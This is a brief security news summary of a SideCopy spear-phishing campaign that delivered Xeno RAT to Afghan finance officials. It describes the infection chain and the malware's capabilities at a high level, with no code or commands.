SideCopy group targets Afghanistan’s Ministry of Finance with Xeno RAT

As reported by The Hacker News, a spear-phishing campaign, likely orchestrated by the Pakistan-aligned SideCopy group, has been identified targeting Afghanistan's Ministry of Finance with the open-source remote access trojan Xeno RAT. This operation, codenamed Operation XENOFISCAL and analyzed by Seqrite Labs, also ensnared provincial revenue and finance directorates, along with Pashto-speaking government officials. The campaign commences with a spear-phishing email containing a ZIP archive with a malicious LNK file written in Pashto, designed to exploit the familiarity of the language within the Afghan government. Upon execution, the LNK file uses mshta.exe to download a remote HTML Application (HTA) from a compromised Afghan education domain, leading to the execution of obfuscated JavaScript. The malware then establishes persistence by mimicking Microsoft Edge, dropping Xeno RAT 1.8.7 and a decoy document via a DLL loader. Xeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture. SideCopy, part of the broader Transparent Tribe (APT36) umbrella, has previously targeted Indian entities with similar malware. This campaign represents a continuation of malicious cyber activity focused on South Asian targets. Source: The Hacker News